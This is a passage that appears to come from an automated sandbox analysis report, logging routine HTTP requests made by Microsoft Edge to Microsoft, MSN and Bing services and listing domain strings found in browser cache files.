          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.facebook.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.aliexpress.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.office.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.youtube.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.wikipedia.org/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.netflix.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.reddit.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.live.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.amazon.com/&origin=PinningWizard HTTP/1.1host: edge.microsoft.comsec-mesh-client-edge-version: 117.0.2045.47sec-mesh-client-edge-channel: stablesec-mesh-client-os: Windowssec-mesh-client-os-version: 10.0.19045sec-mesh-client-arch: x86_64sec-mesh-client-webview: 0sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /bloomfilterfiles/ExpandedDomainsFilterGlobal.json HTTP/1.1host: www.bing.comcookie: ANON=cookie: MUID=cookie: _RwBf=cookie: sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /edge/welcome?form=MT00LJ HTTP/1.1host: www.microsoft.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /edge/welcome?form=MT00LJ HTTP/1.1host: www.microsoft.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-prefers-color-scheme: lightaccept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /en-gb/edge/welcome?form=MT00LJ&cs=581691598 HTTP/1.1host: www.microsoft.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-prefers-color-scheme: lightaccept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /shared/edgeweb/_nuxt/entry.Dbqv1jhx.css HTTP/1.1host: edgecdn-embza6g8cacagcbn.z01.azurefd.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /shared/edgeweb/_nuxt/common-css.Q4s4wSWe.css HTTP/1.1host: edgecdn-embza6g8cacagcbn.z01.azurefd.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /shared/edgeweb/_nuxt/fluent.-6-iNxrq.css HTTP/1.1host: edgecdn-embza6g8cacagcbn.z01.azurefd.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /shared/edgeweb/_nuxt/MediaItemSearchBox.BFsE-D11.css HTTP/1.1host: edgecdn-embza6g8cacagcbn.z01.azurefd.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /shared/edgeweb/_nuxt/common-js.G35jSBqK.css HTTP/1.1host: edgecdn-embza6g8cacagcbn.z01.azurefd.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /shared/edgeweb/_nuxt/EulaPopup.BsF4TKE6.css HTTP/1.1host: edgecdn-embza6g8cacagcbn.z01.azurefd.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1749241528272&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=30e8cc163ded421d80ce84c2447c38af&activityId=30e8cc163ded421d80ce84c2447c38af&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1host: c.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: USRLOC=cookie: _EDGE_S=F=1&SID=2EE4CF8EE2BC609B2948D98DE37C610Dcookie: _EDGE_V=1cookie: SM=Ccookie: SRM_M=2F1941F5ECC860FA30CE57F6ED396174cookie: MR=0cookie: ANONCHK=0cookie: msnup=%7B%22cnex%22%3A%22no%22%7Dcookie: _C_ETH=1cookie: MUID=1860A4A0F02764F239BCB2A3F12F65BB
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1749241528272&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=30e8cc163ded421d80ce84c2447c38af&activityId=30e8cc163ded421d80ce84c2447c38af&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&CtsSyncId=C8C45476B2DB41BAAFBBB1DF6E8A45B3&RedC=c.msn.com&MXFR=1860A4A0F02764F239BCB2A3F12F65BB HTTP/1.1host: c.bing.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-ms-gec: A53560149621CDF558F0573A619C509EE4BCFCB16B4E08AF2A31747944177387sec-ms-gec-version: 1-117.0.2045.47referer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: MR=0cookie: SRM_B=2F1941F5ECC860FA30CE57F6ED396174cookie: SRM_M=2F1941F5ECC860FA30CE57F6ED396174
          Source: global trafficHTTP traffic detected: GET /c.gif?Red3=MSNLI_pd&rid=30E8CC163DED421D80CE84C2447C38AF&lang=en-us&dgk=edgeChromium&imd=1&pn=ntp&rf=&tp=https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004B&gdpr=0&gdpr_consent= HTTP/1.1host: c.bing.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-ms-gec: A53560149621CDF558F0573A619C509EE4BCFCB16B4E08AF2A31747944177387sec-ms-gec-version: 1-117.0.2045.47sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: MR=0cookie: MUID=1860A4A0F02764F239BCB2A3F12F65BBcookie: SRM_B=1860A4A0F02764F239BCB2A3F12F65BBcookie: SRM_M=1860A4A0F02764F239BCB2A3F12F65BB
          Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1749241528272&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=30e8cc163ded421d80ce84c2447c38af&activityId=30e8cc163ded421d80ce84c2447c38af&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&CtsSyncId=C8C45476B2DB41BAAFBBB1DF6E8A45B3&MUID=1860A4A0F02764F239BCB2A3F12F65BB HTTP/1.1host: c.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: USRLOC=cookie: _EDGE_S=F=1&SID=2EE4CF8EE2BC609B2948D98DE37C610Dcookie: _EDGE_V=1cookie: SRM_M=2F1941F5ECC860FA30CE57F6ED396174cookie: MR=0cookie: ANONCHK=0cookie: msnup=%7B%22cnex%22%3A%22no%22%7Dcookie: MUID=1860A4A0F02764F239BCB2A3F12F65BBcookie: SM=T
          Source: global trafficHTTP traffic detected: GET /c.gif?Red3=MSAN_MI9_pd&rid=30E8CC163DED421D80CE84C2447C38AF&lang=en-us&dgk=edgeChromium&imd=1&pn=ntp&rf=&tp=https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004B&gdpr=0&gdpr_consent= HTTP/1.1host: c.bing.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-ms-gec: A53560149621CDF558F0573A619C509EE4BCFCB16B4E08AF2A31747944177387sec-ms-gec-version: 1-117.0.2045.47sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: MR=0cookie: MUID=1860A4A0F02764F239BCB2A3F12F65BBcookie: SRM_B=1860A4A0F02764F239BCB2A3F12F65BBcookie: SRM_M=1860A4A0F02764F239BCB2A3F12F65BB
          Source: global trafficHTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1host: wcpstatic.microsoft.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"origin: https://www.microsoft.comsec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: */*sec-fetch-site: same-sitesec-fetch-mode: corssec-fetch-dest: scriptaccept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: global trafficHTTP traffic detected: GET /notify/served?rid=30e8cc163ded421d80ce84c2447c38af&r=peekriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=b6179361-1057-4f77-8513-fa112ddefe5c&ii=1&c=13930840698051996152&bid=eb7447ec-45f6-4348-b85a-a4afe1ceb3bc&tid=edgechrntp-peekriver-1&ptid=edgechrntp-peekriver-1 HTTP/1.1host: srtb.msn.comsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://ntp.msn.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8cookie: USRLOC=cookie: _EDGE_S=F=1&SID=2EE4CF8EE2BC609B2948D98DE37C610Dcookie: _EDGE_V=1cookie: msnup=%7B%22cnex%22%3A%22no%22%7Dcookie: _C_ETH=1cookie: MUID=1860A4A0F02764F239BCB2A3F12F65BB
          Source: global trafficHTTP traffic detected: GET /shared/cms/lrs1c69a1j/logos/5a74283229e24d0ca59fb94ed941c3a0-png-w256.avif HTTP/1.1host: edgestatic.azureedge.netsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://www.microsoft.com/accept-encoding: identityaccept-language: en-GB,en;q=0.9,en-US;q=0.8
          Source: Favicons.18.drString found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.facebook.com/&origin=PinningWizard equals www.facebook.com (Facebook)
          Source: Favicons.18.drString found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.youtube.com/&origin=PinningWizard equals www.youtube.com (Youtube)
          Source: 429a5f2d-08d2-491a-a090-8852aed746ce.tmp.18.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
          Source: chromecache_833.2.drString found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="6543a74692ff2d459ec1311f" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You&#x27;re successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
          Source: chromecache_862.2.drString found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="65a95d045c1e15ba2a305fe5" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You&#x27;re successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a 